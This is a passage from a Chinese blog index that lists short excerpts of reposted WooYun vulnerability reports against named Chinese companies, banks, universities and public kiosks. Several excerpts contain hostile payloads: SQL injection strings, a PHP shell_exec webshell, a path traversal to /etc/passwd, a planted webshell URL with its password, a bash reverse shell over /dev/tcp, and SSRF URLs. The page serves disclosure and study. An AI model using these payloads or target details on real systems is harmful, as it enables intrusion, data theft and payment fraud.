
乌云漏洞案例学习
乌云漏洞案例学习
FLy_鹏程万里
国内网络安全研究员,专注于Web渗透、移动安全、代码审计、应急响应、内网渗透、区块链安全、云安全等研究方向,擅长渗透测试、红蓝对抗、内网渗透、云安全、区块链安全。
展开
-
【漏洞学习——文件上传】百度Ueditor Django版任意文件上传可Shell
漏洞详情貌似不是百度官方发布的,但是百度推荐使用的。http://fex.baidu.com/ueditor/#server-django后台处理不当,导致任意文件上传。本地下载django版的ueditor,安装好之后访问:打开上传,抓包:现在我们传个py文件,可以看到是禁止的,因为是白名单限制。但是修改imagePathFormat的值为要保存的文件...原创 2019-03-16 14:47:05 · 1085 阅读 · 0 评论 -
【漏洞学习——敏感信息泄露】国药集团福建某系统多处敏感信息泄露
漏洞细节多处敏感信息泄露国药福建OA系统:http://218.5.65.215:8080/yyoa/session泄露:http://218.5.65.215:8080/yyoa/ext/https/getSessionList.jsp?cmd=getAllsession劫持登陆:http://218.5.65.215:8080/yyoa/assess/js/initD...原创 2019-02-22 19:18:13 · 787 阅读 · 0 评论 -
【漏洞学习——未授权访问】百度外卖某运维平台未授权访问
漏洞细节http://180.97.104.104/index百度外卖的日志系统还有些机器正在运行中 参见:https://bugs.shuimugan.com/bug/view?bug_no=170731原创 2019-02-22 19:18:06 · 373 阅读 · 0 评论 -
【漏洞学习——未授权访问】慧聪网Jenkins系统未授权访问
漏洞细节http://58.252.73.136:8007/ (慧聪网询盘宝反馈活动)http://58.252.73.136:8001/login.aspx (慧聪家电城CRM系统)http://58.252.73.136:8080(jenkins管理后台,免密码访问)http://58.252.73.136:8080/script下执行cmd命令println "ipconfi...原创 2019-02-22 19:17:42 · 997 阅读 · 0 评论 -
【漏洞学习——未授权访问】哇哈哈一处未授权访问
漏洞细节哇哈哈一处未授权访问hr1.wahaha.com.cn/kb安全建议:做好访问权限控制参见:https://bugs.shuimugan.com/bug/view?bug_no=171471原创 2019-02-22 19:17:35 · 505 阅读 · 0 评论 -
【漏洞学习——SQL】华图教育某分站SQL注入漏洞
漏洞细节有waf,比较好绕 空格用/**/替换http://cps.huatu.com/index.php/home/gourl/?source=htjysy' and/**/1=1--+http://cps.huatu.com/index.php/home/gourl/?source=htjysy' and/**/1=2--+根据返回判断存在注入不过注入语句有长度限制最后...原创 2019-02-22 19:17:26 · 358 阅读 · 0 评论 -
【漏洞学习——SQL】春播网一处sql注入
漏洞细节春播网一处sql注入,非root用户链接地址:http://www.chunbo.com/helpcenter/index/content_id/56 * 判断条件如图: sqlmap结果当前用户:库:主要表(一个足矣):没有继续深入注入!修复建议:严格过滤参见:https://bugs.shuimugan.com/bug/vie...原创 2019-02-22 19:17:19 · 311 阅读 · 0 评论 -
【漏洞学习——SQL】复旦大学某站SQL注入
漏洞细节注入点:http://www.essrc.fudan.edu.cn/newsdetail.php?pid=27root *1C08A862F27C442990E15B2C4AD6E74B6C83AEE9参见:https://bugs.shuimugan.com/bug/view?bug_no=166630原创 2019-02-22 19:17:12 · 540 阅读 · 0 评论 -
【漏洞学习——任意文件下载/读取】上海农商银行分站任意下载漏洞
漏洞细节http://**.**.**.**:8080/live/down.jsp?file=../../../../../../../../../../../../../../../../etc/passwd参见:https://bugs.shuimugan.com/bug/view?bug_no=150358原创 2019-02-22 19:17:06 · 990 阅读 · 0 评论 -
【漏洞学习——任意文件上传】航天神洁某系统存在任意文件上传漏洞
漏洞细节航天神洁(北京)环保科技有限公司是由中国航天系统科学与工程研究院、中国航天空气动力技术研究院、 航天投资控股 股份 有限公司 和中景恒基集团共同投资组建。http://**.**.**.**/index.asp漏洞地址:http://**.**.**.**/upload_flash.asp通过上传jpg图片,抓包改包为asp后缀上传成功后查看页面源代码可以得...原创 2019-02-22 19:17:00 · 793 阅读 · 0 评论 -
【漏洞学习——任意文件上传】四川外国语大学某分站任意文件上传导致getshell
漏洞细节fck编辑器存在地址:http://**.**.**.**:8080/include/fckeditor/editor/filemanager/upload/test.html上传文件时可在文件名后加空格进行绕过上传getshell修复建议:增加白名单检测绕过参见:https://bugs.shuimugan.com/bug/view?bug_no=15406...原创 2019-02-22 19:16:53 · 718 阅读 · 0 评论 -
【漏洞学习——任意文件上传】LAMP兄弟连旗下猿代码存在任意上传文件漏洞
漏洞细节输入网址:http://www.ydma.cn/ 1、随意注册一个账号2、购买任意免费课程3、进入该课程的讨论区4、点击发表话题,点击上传图片。<?php $x = shell_exec($_GET['XX']); var_dump($x);?>复制返回地址到浏览器打开。例如:http://www.ydma.cn/files/image/201...原创 2019-02-22 19:16:32 · 427 阅读 · 0 评论 -
【漏洞学习——支付漏洞】阿姨帮最新版APP支付漏洞+地址/订单遍历/删除
漏洞细节1、超低价格支付订单点击首页,随便选择一项服务并下订单点击确认支付抓包并先截断提交:POST https://api-cust.ayibang.com/v1/pay/wx/sign HTTP/1.1User-Agent: {"os":"4.4.2","unique":"28552821044111528D2446FF003","version-Code":1012...原创 2019-02-22 19:16:21 · 1276 阅读 · 0 评论 -
【漏洞学习——支付漏洞】酷我音乐会员0.01元购买成功存在支付逻辑漏洞
漏洞细节1、找到酷我会员购买界面,使用微信支付方式2、正常情况下需要通过扫描微信的支付验证码,支付10元购买一个月会员3、0元购买时通过修改数据包的付费金额为0.01元,然后扫描微信支付成功后就可以成功成为会员了修改为0.01元继续操作支付请求变为0.01元了扫一下支付成功后重新登录查看参见:https://bugs.shuimuga...原创 2019-02-22 19:16:12 · 4500 阅读 · 0 评论 -
【漏洞学习——命令执行】普信资产OA系统struts2命令执行
漏洞细节http://oa.puxinasset.com/pxoec/admin/login.action存在struts2命令执行root权限上传webshell http://oa.puxinasset.com/pxoec/woo.jsp 密码wooyun参见:https://bugs.shuimugan.com/bug/view?bug_no=189656 ...原创 2019-02-22 19:16:01 · 463 阅读 · 0 评论 -
【漏洞学习——命令执行】12306某站远程命令执行
漏洞细节存在问题的点:http://hyfw.12306.cn/gateway/DzswD2D/Dzsw/action/FwcszsAction_initWlfwxx论证: 参见:https://bugs.shuimugan.com/bug/view?bug_no=203178原创 2019-02-22 19:15:53 · 458 阅读 · 0 评论 -
【漏洞学习——命令执行】中国民生银行某站命令执行漏洞Getshell
漏洞细节http://58.68.130.68/wis18/customerjsp/msyh/login/login.jsp命令执行漏洞shellhttp://58.68.130.68/wis18/customerjsp/msyh/login/shell.jsp参见:https://bugs.shuimugan.com/bug/view?bug_no=203733...原创 2019-02-22 19:13:20 · 1126 阅读 · 0 评论 -
【漏洞学习——命令执行】开心网多处命令执行
漏洞细节漏洞URL1:http://www.kaixin001.com/set/logo.php在修改头像处,上传正常图片的时候抓包,把下面这个payload直接添加上去就可以直接反弹shellpush graphic-contextviewbox 0 0 640 480image copy 200,200 100,100 "|bash -i >& /dev/tcp...原创 2019-02-22 19:13:12 · 515 阅读 · 0 评论 -
【漏洞学习——URL跳转】百度某站点URL跳转可钓鱼攻击
漏洞细节事情起因是今天下载论文的时候发现了百度学术的跳转,并且url可以任意 (重新整理了一下,下面这个网址有钓鱼站的网址),打开后,看标题,重点是看标题,不是什么跳转。http://xueshu.baidu.com/s?wd=paperuri%3A%284a9cb4a895e665c048089b2b3a78e1cf%29&filter=sc_long_sign&tn=...原创 2019-02-22 19:17:58 · 1823 阅读 · 0 评论 -
【漏洞学习——XML信息泄露】博华网龙防火墙系列产品XML数据库文件未授权访问
漏洞简介博华网龙防火墙系列产品XML数据库文件未授权访问(可登录设备)xml文件中包含用户密码路径/xml/users.xml 参见:https://bugs.shuimugan.com/bug/view?bug_no=207791...原创 2019-02-22 19:18:21 · 913 阅读 · 1 评论 -
【漏洞学习——XSS】Protonmail的存储型XSS漏洞
大家好,这篇文章我将分享在Protonmail的Web端发现两个严重漏洞。漏洞1:暴力破解我在注册了邮箱服务,测试了一些IDOR攻击,虽然没发现什么漏洞,但我在HTTP请求中发现了用来重置密码的10数字码!因此,我可以通过暴力破解来非法重置用户密码。漏洞2:存储型XSS我还在Protonmail电子邮件编写页面中发现了一个存储型XSS,并且只要向其他用户发送构造好的邮件就可...转载 2019-03-07 09:17:19 · 773 阅读 · 0 评论 -
【漏洞学习——XSS】Edmodo网站的XSS漏洞
各位漏洞猎人好!在这篇文章中,我将告诉你我是如何在Edmodo(一个教育互动平台)发现XSS的。这个漏洞是我一个月前发现的。Parth Shah写的一篇关于存储型XSS的文章启发了我。在我浏览edmodo.com网站时,发现了以前从未见过的URL,页面只有一个登录页面和一个简单且过时的布局。嗯,看样子可能存在漏洞。所以,让我们开始吧!那个页面的URL如下:目标URL:ht...转载 2019-03-07 09:14:19 · 1007 阅读 · 0 评论 -
【漏洞学习——沙盒跳出】————8、玩中国科技馆终端
漏洞详情中国科技馆终端未授权访问,可渗透内网。漏洞证明:下午小感冒,就出去转转,去了中国科技馆。进门看到了大恐龙化石,被吸引了,过去看它的介绍终端:放着一个flash,也许是用手机的习惯,我长按屏幕(应该说长压)。出现了adrobe的经典右键界面,按打印弹出对话框:我知道有戏了,我们学校图书馆的终端就是win2003的,可以绕过控制域服务器器,从而控制30多个别的...原创 2019-02-28 10:17:25 · 436 阅读 · 0 评论 -
【漏洞学习——沙盒跳出】————7、某银行自助查询终端可绕过权限控制
漏洞详情今天去鹤壁银行办理业务,在大厅部署了一台自助查询终端设备,为辰通智能设备(深圳)有限公司设计提供,功能设计为使用内置特定浏览器访问该银行网站,查询和办理网银业务。打开任意网页后选中一段文字并拖动,自动打开辰通智能设备(深圳)有限公司网站首页。访问“招贤纳士”模块,有一“发送简历”超链接,点击后自动调用xp系统默认的outlook。在新建邮件界面,添加附件,把cmd.ex...原创 2019-02-28 10:07:07 · 875 阅读 · 0 评论 -
【漏洞学习——沙盒跳出】————6、北京阳光视翰KTV点歌系统V10绕过
漏洞详情辅助功能里面的酒水账单直接调用calc了,所以查看下帮助即可绕出去了。下面是演示步骤1.查看辅助功能2、选择进入酒水账单3、之后发现需要调用了计算器4、之后查看帮助选项,成功逃逸5、界面1:6、界面2:修复方案:调用系统自带的程序需谨慎,计算器功能自己可以设计,其他交互页面也需要谨慎。参见:乌云...原创 2019-02-28 10:00:39 · 1821 阅读 · 0 评论 -
【漏洞学习——沙盒跳出】————5、唐山北火车站某系统服务终端沙盒绕过可调出CMD执行命令
漏洞详情可绕过的是唐山北站的“旅客自助查询系统”服务终端。试试其中的一台。打开首页上的“列车时刻查询”,进入页面后,全选一行文字并长按,成功弹出打印选项,进而成功进入网络选择页面,在搜索处可调出键盘,双击win键即可调出cmd,还有多个可连接终端,下面就不深入了,另一台也请自查吧。修复方案:严格设置权限,禁止...原创 2019-02-28 09:51:01 · 644 阅读 · 0 评论 -
【漏洞学习——沙盒跳出】————4、中国国家图书馆所有查询机以及很多服务终端机可跳出沙盒&提权
漏洞详情1.查询机提权非administrator权限,但可直接修改administrator用户密码等2.服务终端机可通过点击屏幕旁的屏幕键盘,win+r弹出运行,跳出沙盒下面所有终端机全部也可跳出沙盒+提权这些仅仅是二层的一部分终端机,应该还有很多。可进一步渗透内网等……修复方案:严格设置权限,禁止弹出屏幕键盘...原创 2019-02-28 09:36:23 · 613 阅读 · 0 评论 -
【漏洞学习——沙盒跳出】————3、浙江省多家银行的自助机存在安全隐患
漏洞详情今天我去了义乌农商银行办事时顺便玩了一下他们的电子银行自助服务机,我简单的测试了一下,没想到很简单就绕过了,而且还可访问外部网络,可怕的是,我发现浙江好多银行都是用这款自助服务机---丰收e网,机子是浙江农信开发的,已经投放到浙江多家银行使用了,涉及好多家银行的安全,希望能好好处理。具体操作:打开自助服务机主界面,选择电子银行,选择烟草选项,再再烟草网站里面找到联系客服,则跳出...原创 2019-02-28 09:30:27 · 477 阅读 · 0 评论 -
【漏洞学习——沙盒跳出】————2、南京新街口汉庭大堂终端绕过
漏洞详情南京新街口汉庭大堂终端绕过漏洞证明:修复方案:限制功能参见:乌云原创 2019-02-27 17:47:30 · 490 阅读 · 0 评论 -
【漏洞学习——沙盒跳出】————1、九星时代触摸屏报刊阅读系统沙箱通用绕过
漏洞详情法1-点击终端上的期刊阅读,翻看一本杂志几面后,提示购买,直接点击进入,弹出ie窗口而不是内置界面,然后通过ie对系统文件夹“浏览”,调出各种程序法2-系统电源开关位于机箱背面右下角,直接重启,靠快速操作调出各种程序,已测试可行注:本系统每隔1min将会刷新一次,将报刊系统全屏化,但是只要你手快点出任务管理器结束所有有关ninestar的读报系统进程,也就是有关dubao ...原创 2019-02-27 17:38:26 · 682 阅读 · 0 评论 -
【漏洞学习——越权】e家洁某处存在越权漏洞
漏洞细节http://ec.1jiajie.com登陆后打开下面地址http://ec.1jiajie.com/order/contract-order-view?cid=1265cid可篡改泄露部分信息,看了下大部分都是上海公司 修复建议:鉴权参见:https://bugs.shuimugan.com/bug/view?bug_no=171...原创 2019-02-22 19:19:18 · 361 阅读 · 1 评论 -
【漏洞学习——越权】佑一良品某站多处平行越权漏洞
漏洞细节佑一良品(www.uiyi.cn)主站多处平行越权漏洞,主要有以下几个功能:1,收货地址删除功能;2,收货地址修改查看功能;3,订单取消功能;4,意见反馈删除功能。以上几个功能都存在平行越权漏洞,大概请求分别如下:1)订单取消功能:POST /Cancel/NewCancelOrder HTTP/1.1Host: my.uiyi.cnOrderNo=160414754...原创 2019-02-22 19:19:11 · 603 阅读 · 0 评论 -
【漏洞学习——越权】Mtime时光网越权查看订单
漏洞细节时光网app下载地址 http://feature.mtime.com/mobile/测试的是ios客户端有两处接口可越权遍历订单#1 GET /ECommerce/GoodsOrderInfo.api?goodsOrderId=7708428 HTTP/1.1Host: api.m.mtime.cnX-MTime-Mobile-CheckValue: 5,146...原创 2019-02-22 19:19:04 · 707 阅读 · 0 评论 -
【漏洞学习——越权】暴风某站平行越权(用户敏感信息泄露)
漏洞细节http://www.bftv.com/正常下单更改shipping_address_id 修复方案鉴权 参见:https://bugs.shuimugan.com/bug/view?bug_no=207583原创 2019-02-22 19:18:55 · 653 阅读 · 1 评论 -
【漏洞学习——越权】华住酒店某处越权删除修改用户信息
漏洞细节商城收货地址越权修改与删除,遍历地址id就可越权操作,目前是3万多地址https://hmall.huazhu.com/member_addressList.html修改:POST /api/shop/memberAddress!edit.do?addr_id=37860 HTTP/1.1Host: hmall.huazhu.comConnection: keep-...原创 2019-02-22 19:18:47 · 1588 阅读 · 1 评论 -
【漏洞学习——短信验证】美美箱注册绕过短信验证
漏洞细节美美箱注册时可以根据请求的短信接口返回信息获取验证码,这样,就可以随意填写手机号,绕过信息验证!参见:https://bugs.shuimugan.com/bug/view?bug_no=186883...原创 2019-02-22 19:18:39 · 1693 阅读 · 1 评论 -
【漏洞学习——XML注入】高德导航某接口XML实体注入
漏洞细节在我对高德地图离线版进行测试时抓到一个接口便进行了深入测试http://us.autonavi.com实际产生漏洞的接口:http://us.autonavi.com/navisoftware/tips一个正常的页面抓包内容:POST /navisoftware/tips HTTP/1.1Host: us.autonavi.comContent...原创 2019-02-22 19:18:30 · 611 阅读 · 1 评论 -
【漏洞学习——SSRF】小米某处SSRF漏洞(可内网SHELL 附多线程Fuzz脚本)
漏洞细节#1 存在漏洞位置,Discuz 论坛SSRF漏洞http://www.miui.com/forum.php?mod=ajax&action=downremoteimg&message=[img]http://fuzz.wuyun.com/302.php?data=helo.jpg[/img]#2 服务器支持dict、ftp、http协议http://www.mi...原创 2019-02-22 17:52:49 · 1422 阅读 · 0 评论 -
【漏洞学习——SSRF】QQ空间某处SSRF
漏洞细节问题在这里长话短说。此时请求了这么个js文件。http://sns.qzone.qq.com/cgi-bin/qzshare/cgi_qzshareget_urlinfo?fupdate=1&url=http://127.0.0.1:8081/&g_tk=2109654981就这样。修复方案过滤来源地址,我也不是很清楚到底该怎么去描述这个修复方法...原创 2019-02-22 17:52:42 · 547 阅读 · 0 评论 -
【漏洞学习——XSS】懒人听书存储性XSS
漏洞细节1、在个性签名处存在XSS跨站脚本漏洞。1.1、虽然在这里js代码执行不了,但是,当我们关注了其他用户以后,当用户查看关注通知时就会触发js代码。1.2、获取到cookie另外在我的节目:内容简介处,节目名称处也存在XSS。参见:https://bugs.shuimugan.com/bug/view?bug_no=130995...原创 2019-02-22 17:47:45 · 575 阅读 · 0 评论